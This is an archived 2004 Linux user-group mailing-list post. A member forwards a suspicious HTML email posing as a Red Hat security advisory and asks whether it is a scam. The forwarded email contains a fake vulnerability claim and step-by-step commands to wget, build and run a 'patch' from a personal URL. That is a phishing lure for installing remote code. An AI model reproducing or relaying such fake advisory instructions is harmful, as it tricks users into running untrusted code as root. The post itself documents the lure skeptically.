LINUX.IE, website of the Irish Linux Users' Group
Tux rules!

   
Home
New Users
Articles
Download
Projects
Community
Vendors

  Print Version
Email to...
 
Archives:


planetILUG

Recent News

News Archive


Join the
ILUG
on FaceBook


Join the
ILUG
on LinkedIn


Join the
ILUG SETI
Group



















 
 :: Mailing Lists

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

Marek m.mcgann at sussex.ac.uk
Sat Oct 23 12:35:44 IST 2004 

Thought you might be interested to see the below - it's the first time I've 
seen anything like this for Linux (apologies for the html mail, but that's 
how it arrived) . 

I presume it's this Joeio in Stanford (or whoever) trying to spam his way into 
Red Hat boxes?

Interesting to see someone considering desktop "not-terribly-clued-in" Linux 
users a worthwhile target.

Or am I being too suspicious about it?

----------  Forwarded Message  ----------

Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
Date: Saturday 23 October 2004 05:37
From: RedHat Security Team <security at redhat.com>
To: <another mailing list I'm subscribed to>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {font-size: 12px}
- -->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p>  Redhat found a vulnerability in fileutils (ls and mkdir), that could
 allow a remote attacker to execute arbitrary code with root privileges. Some
 of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
 *BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
 strongly advises you to immediately apply the<strong> fileutils-1.0.6
 patch</strong>. This is a critical-critical update that you must make by
 following these steps:</p> <ul>
  <li>First download the patch from the Stanford RedHat mirror:
 <strong><em>wget
 www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
 <li>Untar the patch:<em><strong> tar zxvf
 fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
 fileutils-1.0.6.patch</strong></em></li>
  <li><em><strong>make</strong></em></li>
  <li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system
 and others` to be compromised.</p> <p>Thank you for your prompt attention to
 this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights reserved.  
 </p> </body>
</html>

- -------------------------------------------------------

More information about the ILUG mailing list
Read this without the formatting.
                                                                                                    

  

Hosted by HEAnet


 Maintained by the ILUG website team. The aim of Linux.ie is to support and help commercial and private users of Linux in Ireland. You can display ILUG news in your own webpages, read backend information to find out how. Networking services kindly provided by HEAnet, server kindly donated by Dell. Linux is a trademark of Linus Torvalds, used with permission. No penguins were harmed in the production or maintenance of this highly praised website. Looking for the Indian Linux Users' Group? Try here. If you've read all this and aren't a lawyer: you should be!
RSS Version
Powered by Dell